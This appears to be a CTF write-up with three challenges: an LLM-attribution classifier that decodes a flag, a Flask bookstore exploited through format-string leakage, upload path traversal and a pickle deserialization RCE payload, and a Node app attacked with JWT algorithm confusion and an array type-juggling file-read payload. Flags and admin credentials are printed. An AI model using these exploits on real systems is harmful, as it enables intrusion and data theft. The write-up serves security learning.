Virtual Identity Recognition Battle (虚拟身份辨识战)

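Challenge details

You are given a dataset and must work out which large language models produced a newly collected set of conversations.

Files

  • bert-mini-model: a folder containing the bert-mini model, which has about 11M parameters.
  • dataset.json: a dataset of conversations held with four large language models (LLMs). The label field records which LLM the conversation was held with, in the range 0-3.
    Sample data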
[
{
"conversation": [
{
"role": "user",
"content": "1. Take the input list of unsorted integers from the user."
},
{
"role": "assistant",
"content": "To take an input list of unsorted integers from the user, you can follow these steps in a Python script:\n\n1. Prompt the user to enter a list of numbers separated by spaces or commas.\n2. Read the input from the user.\n3. Split the input string into individual components.\n4. Convert these components into integers.\n5. Handle any potential errors that may occur during input and conversion (e.g., non-numeric input).\n\nHere's a sample Python code to demonstrate this process:\n\n```python\n# Prompt the user to enter a list of integers\nuser_input = input(\"Enter a list of integers, separated by spaces or commas: \")\n\n# Convert the input string into a list of strings split by spaces or commas\n# Also strip whitespace in case of input separated by both spaces and commas\nstr_numbers = user_input.replace(',', ' ').split()\n\ntry:\n # Convert the list of strings into a list of integers\n int_numbers = [int(num) for num in str_numbers]\n print(\"You entered the following list of integers:\", int_numbers)\nexcept ValueError:\n print(\"Please enter valid integers only.\")\n\n```\n\nThis code snippet will prompt the user to enter a list of integers either separated by spaces or commas, and then it will output the list of integers. It includes a basic error handling for non-integer inputs by catching a `ValueError`. Adjust the input prompt and error handling to fit your specific use case as necessary."
}
],
"label": 0
},
...
]
  • flag.json: newly collected LLM conversation data.
    Sample data
[
{
"conversation": [
{
"role": "user",
"content": "Continuation: What could be the probable outcome if someone fails to revise their model after the second experiment?\nGenerate according to: After an initial observations, the students believe they know how the strings are connected inside the Mystery Tube. After you perform a second \"experiment\", their observations confuse them. They have to revise their model. Finally, your third \"experiment\" baffles them. Just how are the strings connected?\nAfter performing this demonstration, students BEG me to tell them the secret for months... a few will try for more than a year. Some have tried to steal the Mystery Tube... one actually succeeded. Some have built their own at home just so they can figure out how it works.\nThis is a fun demonstration and students will learn a lot about scientific investigation."
},
{
"role": "assistant",
"content": "If someone fails to revise their model after the second experiment in the Mystery Tube demonstration, several probable outcomes could occur:\n\n1. Misconceptions:\n- They might hold onto incorrect assumptions about how the strings are connected\n- This could lead to persistent misunderstandings about the actual mechanism\n\n2. Limited Learning:\n- They would miss the crucial lesson about how scientific models need to be flexible and adaptable\n- The importance of revising hypotheses based on new evidence would be lost\n\n3. Frustration:\n- They might become increasingly frustrated when their original model fails to explain new observations\n- This could lead to disengagement from the learning process\n\n4. Missed Scientific Process:\n- They would fail to experience the authentic scientific process of model revision\n- The valuable lesson about how scientists must adjust their theories based on new data would be lost\n\n5. Incomplete Understanding:\n- Their understanding of the phenomenon would remain incomplete or incorrect\n- This could affect their ability to grasp similar concepts in future scientific investigations\n\nThe key learning opportunity in this demonstration lies in the process of revising one's thinking based on new evidence, so failing to do so would significantly diminish the educational value of the experience."
}
]
},
...
]
  • flag_process.py: helper code that decodes the predicted LLM labels into the flag
from reedsolo import RSCodec
import random
import math
import string

FLAG_TOTAL_LENGTH = 32
FLAG_PART_LENGTH = 8
assert FLAG_TOTAL_LENGTH % FLAG_PART_LENGTH == 0
NSYM = math.ceil(FLAG_TOTAL_LENGTH * 0.4 * 2)  # number of Reed-Solomon parity bytes
PERCENT_TO_CORRUPT = 0.1  # fraction of labels to corrupt (10%)

def encode_flag(message):
    """
    Encoder: append Reed-Solomon redundancy to the given flag.
    """
    rs = RSCodec(NSYM)  # create the Reed-Solomon encoder
    encoded_message = rs.encode(message)  # append the parity bytes
    return encoded_message

def decode_flag(encoded_message):
    """
    Decoder: try to decode and recover the original message.
    Uses the fixed redundancy of NSYM bytes.
    """
    rs = RSCodec(NSYM)  # create the Reed-Solomon decoder
    try:
        decoded_message, _, _ = rs.decode(encoded_message)  # decode and correct errors
        return decoded_message
    except Exception as e:
        print("Failed to decode message:", e)
        return None

# Convert a list of numbers in 0-3 to bytes
def encode_to_bytes(numbers):
    # Each number takes 2 bits, so 4 numbers make up 1 byte
    bit_string = ''
    for num in numbers:
        cur_bin = format(num, '02b')  # number 0-3 as a 2-bit binary string
        assert len(cur_bin) == 2
        bit_string += cur_bin
    assert len(bit_string) % 8 == 0
    byte_array = int(bit_string, 2).to_bytes(len(bit_string) // 8, byteorder='big')
    return byte_array


# Convert bytes back to a list of numbers in 0-3
def decode_from_bytes(byte_array):
    # Each byte is split into 4 numbers
    bit_string = ''
    for i in range(len(byte_array)):
        assert 0 <= byte_array[i] <= 255
        byte_bin = bin(byte_array[i])[2:].zfill(8)  # byte as an 8-bit binary string
        assert len(byte_bin) == 8
        bit_string += byte_bin

    # Cut every 2 bits and parse each pair as a number in 0-3
    numbers = []
    for i in range(0, len(bit_string), 2):
        num = int(bit_string[i:i+2], 2)
        numbers.append(num)

    return numbers

def generate_random_flag():
    """
    Generate a flag of the form abcdefgh-abcdefgh-abcdefgh-abcdefgh wrapped in flag{}.
    Each part is FLAG_PART_LENGTH (8) random lowercase letters.
    """
    parts = ["".join(random.choices(string.ascii_lowercase, k=FLAG_PART_LENGTH)) for _ in range(FLAG_TOTAL_LENGTH // FLAG_PART_LENGTH)]
    flag = f"flag{{{'-'.join(parts)}}}"
    return flag.encode()

if __name__ == "__main__":
    for idx in range(0x200):
        print(f"====== {idx} ======")
        # Generate a random flag (41 bytes including the flag{} wrapper)
        flag = generate_random_flag()
        print(f"Original message ({len(flag)}):", flag)

        # Encode: append the redundancy to the flag
        encoded_message = encode_flag(flag)
        print(f"Encoded message ({len(encoded_message)}):", encoded_message)

        # Convert the encoded bytes to a list of labels
        labels = decode_from_bytes(encoded_message)
        print(f"Decoded labels ({len(labels)})")

        # Simulate corruption of 10% of the labels
        num_labels = len(labels)
        num_labels_to_corrupt = math.ceil(num_labels * PERCENT_TO_CORRUPT)

        # Build random corruption intervals
        num_intervals = random.randint(1, 5)  # pick 1 to 5 intervals at random
        intervals = []
        remaining_corruption = num_labels_to_corrupt
        for _ in range(num_intervals):
            if remaining_corruption == 0:
                break
            start_index = random.randint(0, num_labels - 1)
            max_length = min(remaining_corruption, num_labels - start_index)
            interval_length = random.randint(1, max_length)
            end_index = start_index + interval_length
            intervals.append((start_index, end_index))
            remaining_corruption -= interval_length

        # Apply the corruption
        for start_index, end_index in intervals:
            for i in range(start_index, end_index):
                labels[i] = random.randint(0, 3)  # replace with a random value in 0-3

        # Decode: recover the original message
        noisy_message = encode_to_bytes(labels)  # back to a byte sequence
        print(f"Noisy message ({len(noisy_message)}):", noisy_message)
        decoded_flag = decode_flag(noisy_message)  # decode and correct errors
        assert decoded_flag
        print("Decoded (recovered) message:", decoded_flag)
        assert flag == decoded_flag

    print("success")

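More information

For every conversation in flag.json you must predict a label indicating which LLM produced it. The label range is the same as in dataset.json, 0-3.
After predicting the N labels, follow the code in flag_process.py to decode them into the actual flag.

The flag is encoded with a redundant error-correcting code, so a prediction accuracy above roughly 95% is enough to decode it; the higher the accuracy, the more likely decoding succeeds.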
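
To see where the figure of roughly 95% comes from, here is a minimal sketch of the label packing and of the Reed-Solomon error budget. It reuses the constants from flag_process.py; labels_to_bytes is a hypothetical helper written for illustration, and the flag layout (and therefore the label count) is an assumption based on generate_random_flag, not something read from flag.json.

```python
import math

FLAG_TOTAL_LENGTH = 32
NSYM = math.ceil(FLAG_TOTAL_LENGTH * 0.4 * 2)  # parity bytes, same formula as flag_process.py


def labels_to_bytes(labels):
    """Pack labels (each 0-3) four to a byte, most significant pair first."""
    assert len(labels) % 4 == 0
    out = bytearray()
    for i in range(0, len(labels), 4):
        a, b, c, d = labels[i:i + 4]
        out.append((a << 6) | (b << 4) | (c << 2) | d)
    return bytes(out)


# Assumed flag layout: "flag{" + 32 letters + 3 hyphens + "}"
flag_len = len("flag{") + FLAG_TOTAL_LENGTH + 3 + len("}")
codeword_len = flag_len + NSYM   # bytes after Reed-Solomon encoding
num_labels = codeword_len * 4    # one label per 2 bits
max_bad_bytes = NSYM // 2        # byte errors correctable at unknown positions
# Worst case: every wrong label falls into a different byte
worst_case_accuracy = 1 - max_bad_bytes / num_labels

print(labels_to_bytes([1, 2, 1, 2]))  # bits 01 10 01 10 form the byte for "f"
print(codeword_len, num_labels, max_bad_bytes, round(worst_case_accuracy, 3))
```

Wrong labels that happen to share a byte count as a single byte error, so decoding can still succeed somewhat below this worst-case accuracy.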

Runtime environment

1 × RTX 3090
PyTorch 2.5.1
Python 3.12 (ubuntu22.04)
CUDA 12.4

pip install transformers
pip install reedsolo

Training the model

train.py

import json
import torch
from torch.utils.data import TensorDataset, DataLoader
from transformers import BertTokenizer, BertForSequenceClassification
from tqdm import tqdm
from torch.optim import AdamW

# Load the dataset
with open('dataset.json', 'r', encoding="UTF-8") as f:
    data = json.load(f)

# Collect the texts and labels; only the first assistant reply of each conversation is used
contents = []
labels = []
for i in range(len(data)):
    contents.append(data[i]['conversation'][1]['content'])
    labels.append(data[i]['label'])

# Load the pretrained BERT tokenizer
tokenizer = BertTokenizer.from_pretrained('bert-mini-model')
# Load the pretrained BERT sequence classification model with 4 output classes
model = BertForSequenceClassification.from_pretrained('bert-mini-model', num_labels=4)

# Tokenize all texts:
# truncation=True - texts longer than the maximum length are truncated
# padding='max_length' - pad to the maximum length
# max_length=512 - maximum sequence length (the standard BERT length)
# return_tensors='pt' - return PyTorch tensors
encodings = tokenizer(contents, truncation=True, padding='max_length', max_length=512, return_tensors='pt')
# Encoded input ID tensor
input_ids = encodings['input_ids']
# Attention mask tensor (marks real content versus padding)
attention_mask = encodings['attention_mask']
# Convert the label list to a PyTorch tensor
labels = torch.tensor(labels)

# Create the dataset and data loader
dataset = TensorDataset(input_ids, attention_mask, labels)
dataloader = DataLoader(dataset, batch_size=8, shuffle=True)

# Select the device
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print(f"Using device: {device}")
model.to(device)

# AdamW optimizer with a learning rate of 2e-5
optimizer = AdamW(model.parameters(), lr=2e-5)

for epoch in range(3):
    model.train()
    total_loss = 0
    progress_bar = tqdm(dataloader, desc=f'Epoch {epoch + 1}')  # progress bar

    for batch in progress_bar:
        input_ids, attention_mask, labels = [b.to(device) for b in batch]

        optimizer.zero_grad()

        # Forward pass
        outputs = model(input_ids=input_ids, attention_mask=attention_mask, labels=labels)
        loss = outputs[0]  # when labels are passed, the first output is the loss
        total_loss += loss.item()  # accumulate the loss

        loss.backward()  # backpropagate to compute gradients
        optimizer.step()  # update the model parameters

        # Show the current loss on the progress bar
        progress_bar.set_postfix({'loss': loss.item()})

    # Compute and print the average loss of the epoch
    avg_loss = total_loss / len(dataloader)
    print(f'Epoch {epoch + 1}, Average Loss: {avg_loss:.4f}')

# Save the trained model and tokenizer
model.save_pretrained('trained_model')
tokenizer.save_pretrained('trained_tokenizer')

Predicting the labels

predict.py

import json
import torch
from transformers import BertTokenizer, BertForSequenceClassification
from tqdm import tqdm
from flag_process import encode_to_bytes, decode_flag

# Load the trained model and tokenizer
model_path = 'trained_model'
tokenizer_path = 'trained_tokenizer'
tokenizer = BertTokenizer.from_pretrained(tokenizer_path)
model = BertForSequenceClassification.from_pretrained(model_path)

device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print(f"Using device: {device}")
model.to(device)
model.eval()

# Load the input data; as in training, use the first assistant reply of each conversation
with open('flag.json', 'r', encoding='utf-8') as f:
    contents = json.load(f)
predict_contents = []
for content in contents:
    predict_contents.append(content['conversation'][1]['content'])
print(f"Loaded {len(predict_contents)} conversations")

# Predict a label in 0-3 for every conversation with the BERT model
predictions = []
for text in tqdm(predict_contents):
    encoding = tokenizer(text, max_length=512, padding='max_length', truncation=True, return_tensors='pt')
    input_ids = encoding['input_ids'].to(device)
    attention_mask = encoding['attention_mask'].to(device)
    with torch.no_grad():
        outputs = model(input_ids=input_ids, attention_mask=attention_mask)

    logits = outputs.logits
    pred = torch.argmax(logits, dim=1).item()
    predictions.append(pred)

# Decode the labels as in flag_process.py. The random corruption loop in its
# __main__ block only simulates prediction errors for testing, so it is not
# applied to the real predictions here.
message = encode_to_bytes(predictions)
print(f"Predicted message ({len(message)}):", message)
decoded_flag = decode_flag(message)
print("Decoded (recovered) message:", decoded_flag)

The flag, worth 1000 points:

flag{umtsywtc-coxcigwv-njqbbipq-tqucbeip}

bookstore

The /backup route leaks the application's source code.

app.py

from flask import Flask, request, \
    session, g, redirect, url_for, \
    abort, render_template, flash, \
    render_template_string
import os
from settings import *
import pickle
import re
import traceback

app = Flask(__name__)
app.config.update(dict(
    DATABASE='',
    DEBUG=True,
    SECRET_KEY=os.environ.get('SECRET_KEY'),
))
app.config.from_envvar('FLASKR_SETTINGS', silent=True)

class ErrorHandler():
    def __init__(self):
        self.notfound = "Oops! That page doesn't exist."
        self.badreqyest = "Your Rquest We Could Not Understand"

@app.errorhandler(404)
def page_not_found(error):

    template = '''
<div class="center-content error">
<h1>{error.notfound} !!!</h1>
<h2>''' + request.url + '''</h2>
</div>
'''
    error = ErrorHandler()
    return template.format(error = error), 404

def get_books(book_name=None):
    if book_name:
        try:
            with open('./books/' + book_name, 'rb') as f:
                book = pickle.load(f)
                return book
        except:
            return None
    else:
        books = []
        dirs = os.listdir("./books/")
        for book_name in dirs:
            try:
                with open('./books/' + book_name, 'rb') as f:
                    book = pickle.load(f)
            except:
                continue
            books.append(book)
        return books

def save_book(book_name, book_bio, book_img, book_price, book_num):
    book = pickle.dumps((book_name, book_img, book_bio, book_price, book_num))
    with open('./books/' + book_name, 'wb') as f:
        f.write(book)

@app.route("/bookAdd",methods=['POST','GET'])
def upload():
    if session.get('logged_in', None) and session.get('name', None) == 'admin':
        if request.method == 'POST':
            try:
                book_name = request.form.get('book_name')
                book_bio = request.form.get('book_bio')
                book_price = int(request.form.get('book_price'))
                book_num = int(request.form.get('book_num'))

                f = request.files['myfile']
                book_img = f.filename
                save_book(book_name, book_bio, book_img, book_price, book_num)
                f.save("./static/img/"+f.filename)
            except Exception as e:
                traceback.print_exc()
                return "Something Wrong!!!"
            return "Book Add Success"
        else:
            return render_template('tmpl/bookAdd.html')
    return 'You are not login'

# Home page
@app.route('/')
@app.route('/index')
def index():
    if session.get('logged_in', None):
        name = session.get('name')
        if name == 'admin':
            return render_template('index.html')
    else:
        session['logged_in'] = 0
        session['name'] = 'Anonymous'
    msg = 'Please Login First, {} '

    return render_template('index.html', msg=msg.format(session.get('name')))

@app.route('/login',methods=['POST','GET'])
def login():
    if request.method == 'GET':
        return render_template('login.html')
    else:
        username = request.form.get('username')
        password = request.form.get('password')
        if username == ADMIN_USER and password == ADMIN_PASSWORD:
            session['logged_in'] = 1
            session['name'] = 'admin'
        msg = 'Please Login First, {} '
        return render_template('index.html', msg=msg.format(session.get('name')))

@app.route('/logout')
def logout():
    session['logged_in'] = 0
    session['name'] = 'Anonymous'
    msg = 'Please Login First, {} '
    return render_template('index.html', msg=msg.format(session.get('name')))

@app.route('/bookDetail/<string:book_name>')
def book_detail(book_name):
    book = get_books(book_name)
    return render_template('tmpl/bookDetail.html', book=book)

@app.route('/backup')
def hint():
    return open(__file__).read()

@app.route('/bookList')
def book_list():
    books = get_books()
    return render_template('tmpl/bookList.html', books=books)

if __name__ == '__main__':
    app.run(host='0.0.0.0',debug=False,port=8080)

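Auditing the code shows that the goal is to act as admin and save a book, which opens the way to pickle deserialization.

Acting as admin requires the admin username and password. The 404 handler has a format string vulnerability: request.url is concatenated into the template before template.format(error=error) is called, so any {...} field placed in the requested URL is evaluated by str.format.

Requesting a nonexistent path that contains the following field walks from the error object to its __init__ method and dumps the module's global variables:

{error.__init__.__globals__}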
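
The leak can be reproduced without Flask. The sketch below mimics the 404 handler under stated assumptions: render_404 is a hypothetical stand-in for page_not_found, and ADMIN_PASSWORD holds a placeholder value rather than the real credential.

```python
ADMIN_PASSWORD = "placeholder-password"  # placeholder; stands in for a global imported from settings


class ErrorHandler:
    def __init__(self):
        self.notfound = "Oops! That page doesn't exist."


def render_404(url):
    # Same flaw as page_not_found: the attacker-controlled URL becomes part of
    # the format string before .format() is called.
    template = "<h1>{error.notfound} !!!</h1><h2>" + url + "</h2>"
    return template.format(error=ErrorHandler())


# A replacement field in the URL is resolved against the `error` argument:
# error -> bound method __init__ -> the globals dict of the defining module
page = render_404("http://host/{error.__init__.__globals__[ADMIN_PASSWORD]}")
print(page)
```

Building the template with a fixed placeholder and passing the URL as a format argument (for example "{url}" with url=request.url) would keep the URL from being parsed as a format string.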

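This reveals the credentials:

admin:nishibukenengcaichulaide12345678

After logging in, books can be added.
The next step is to generate a pickle file and upload it into the books directory, where loading it executes the command.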
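
In app.py the upload is saved with f.save("./static/img/" + f.filename) and the filename is not sanitized, so a relative path in the multipart filename is presumably how the file reaches the books directory. The sketch below only resolves the path; upload_destination is a hypothetical helper and the filename is an assumed example, not the one used in the original exploit.

```python
import posixpath


def upload_destination(filename):
    # Mirrors the string concatenation in upload(); nothing strips "../"
    return posixpath.normpath("./static/img/" + filename)


dest = upload_destination("../../books/evil")
print(dest)
```

Once the file sits in books, get_books() unpickles it when /bookList or /bookDetail/<book_name> is requested, which is where the payload runs.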

exp.py

import pickle

class A():
    def __reduce__(self):
        # On unpickling, eval() runs the string, which writes the listing of / to a web-readable file
        return (eval, ("__import__('o'+'s').system('ls / > ./static/img/ls')",))

a = A()
with open("./test.pkl", "wb") as f:
    pickle.dump(a, f)

The flag is then retrieved from under static.

Alternatively:

gen-opcode.py

import pickle
import os
import base64

class genpoc(object):
    def __reduce__(self):
        s = """ls -al / > ./static/img/shell.out"""  # command to execute
        return os.system, (s,)  # __reduce__ must return a tuple or a string

e = genpoc()
poc = pickle.dumps(e)
print(base64.b64encode(poc))

After running it, base64-decode the output and save the result to a file.

Upload it with Burp.

Finally, request ../../static/shell.out; the flag is found in the environment variables.

Deprecated

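The JWT handling here is odd.

Verification accepts both the asymmetric RS256 and the symmetric HS256, but tokens are signed only with the asymmetric RS256.

So with the public key in hand, an attacker can sign an HS256 token using the public key as the HMAC secret and forge any identity.

Following web01 from the 2024 Wangding Cup (网鼎杯) Qinglong group, the public key can be recovered from several RS256-signed tokens.

With the public key recovered, forging a token is straightforward: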

const jwt = require('jsonwebtoken');
const fs = require('fs');

// Recovered public key, used here as the HS256 shared secret
const publicKey = fs.readFileSync('./b3ec3db187fa955c_65537_x509.pem', 'utf8');
// Claims checked by the server ('priviledge' is the server's own spelling)
const data = {
    username: "admin",
    priviledge: 'File-Priviledged-User'
};
console.log(jwt.sign(data, publicKey, { algorithm: 'HS256' }));
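
For readers who want to see what the HS256 signing step computes, here is a minimal sketch of the same forgery with only the Python standard library. forge_hs256 and b64url are hypothetical helper names, and the PEM bytes are a placeholder; in a real run they would have to match, byte for byte, the key material the server passes to its verifier.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    """Base64url without padding, as used by JWT."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def forge_hs256(claims: dict, public_key_pem: bytes) -> str:
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        b64url(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url(json.dumps(claims, separators=(",", ":")).encode())
    )
    # Algorithm confusion: the public key bytes serve as the HMAC secret
    sig = hmac.new(public_key_pem, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


# Placeholder bytes standing in for the recovered PEM file
pem = b"-----BEGIN PUBLIC KEY-----\n(placeholder)\n-----END PUBLIC KEY-----\n"
token = forge_hs256({"username": "admin", "priviledge": "File-Priviledged-User"}, pem)
print(token)
```

A verifier that pins the expected algorithm to RS256 would reject such a token, because the header's alg would no longer select the verification method.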

The checkfile route allows reading files:

router.get('/checkfile', AuthMiddleware, async (req, res, next) => {
    try{
        let user = await db.getUser(req.data.username);
        if (user === undefined) {
            return res.send(`user ${req.data.username} doesn't exist.`);
        }
        if (req.data.username === 'admin' && req.data.priviledge==='File-Priviledged-User'){
            let file=req.query.file;
            if (!file) {
                return res.send('File name not specified.');
            }
            if (!allowedFile(file)) {
                return res.send('File type not allowed.');
            }
            try{
                if (file.includes(' ') || file.includes('/') || file.includes('..')) {
                    return res.send('Invalid filename!');
                }
            }
            catch(err){
                return res.send('An error occured!');
            }

            if (file.length > 10) {
                file = file.slice(0, 10);
            }
            const returned = path.resolve('./' + file);
            fs.readFile(returned, (err) => {
                if (err) {
                    return res.send('An error occured!');
                }
                res.sendFile(returned);
            });
        }
        else{
            return res.send('Sorry Only priviledged Admin can check the file.').status(403);
        }

    }catch (err){
        return next(err);
    }
});
const allowedFile = (file) => {
    const format = file.slice(file.indexOf('.') + 1);
    return format == 'log';
};

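At first glance this logic looks fine, but the key is this line:

return format == 'log';

JavaScript has both loose (==) and strict (===) equality. With loose equality an array is coerced to a string before the comparison, so the following also evaluates to true:

console.log(['log']=="log")

So the idea is simple: pass an array. Methods such as indexOf, includes and slice exist on both arrays and strings, so every check can be bypassed:

var filename = ['','','','','','','','','','../../../../../flag.txt',"./",'.','log']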
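
To follow what each check sees, here is a Python model of the JavaScript behavior; it is a sketch, not the server code. List operations stand in for the JS array methods, ",".join imitates how JS turns an array into a string during concatenation, and the working directory /app is an assumption.

```python
import posixpath

payload = [""] * 9 + ["../../../../../flag.txt", "./", ".", "log"]

# allowedFile: indexOf('.') finds the element '.', and slice() keeps what follows it.
# In JS, ['log'] == 'log' is true because the array is coerced to the string 'log'.
ext = payload[payload.index(".") + 1:]

# Array includes() compares whole elements, so ' ', '/' and '..' are never found
blocked = any(x in payload for x in (" ", "/", ".."))

# More than 10 elements, so slice(0, 10) drops the helper elements at the end
kept = payload[:10]

# './' + array joins the elements with commas
joined = "./" + ",".join(kept)

# Lexical resolution against the assumed working directory /app
resolved = posixpath.normpath(posixpath.join("/app", joined))
print(ext, blocked, joined, resolved)
```

The nine commas fuse with the first ".." into a single bogus directory name, which the next ".." cancels; the remaining ".." segments then climb out of the working directory.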
